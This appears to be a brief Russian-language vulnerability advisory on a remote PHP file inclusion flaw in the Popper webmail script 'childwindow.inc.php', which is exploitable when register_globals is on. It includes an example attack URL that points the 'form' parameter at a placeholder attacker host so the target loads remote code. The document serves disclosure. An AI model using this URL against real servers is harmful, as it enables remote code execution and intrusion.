PHP-инклюдинг в Popper

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный php сценарий на целевой системе.

Уязвимость существует в сценарии 'childwindow.inc.php' из-за недостаточной обработки входных данных в параметре 'form'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий на целевой системе. Уязвимость существует, если включена опция 'register_globals' в конфигурационном файле php. Пример:

http://[target]/popper/childwindow.inc. php?form=http://[attacker]/test

URL производителя: www.ractive.ch/popper/

Решение: Способов устранения уязвимости не существует в настоящее время.